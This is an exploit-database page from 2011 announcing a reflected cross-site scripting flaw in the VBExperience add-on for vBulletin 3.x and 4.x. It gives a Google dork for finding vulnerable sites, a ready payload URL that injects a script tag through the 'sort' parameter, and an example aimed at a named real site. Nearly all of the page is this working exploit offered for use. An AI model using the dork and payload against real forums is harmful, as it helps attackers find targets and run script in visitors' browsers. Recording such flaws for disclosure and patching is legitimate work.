Home / exploitsPDF  

vBulletin VBExperience Cross Site Scripting

Posted on 17 June 2011

++++++++++++++++++++++++++++++++++++++++ [~] Author : Mr.ThieF <~ [~] Contact : Mr.ThieF@yahoo.com <~ [~] DorK : inurl:xperience.php [~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=245023 [~] Version : 4.x.x - 3.x.x [~] Exploit : http://[site]/[path]/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script> [~] Example : http://www.vbaddict.net/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script> ++++++++++++++++++++++++++++++++++++++++

 

TOP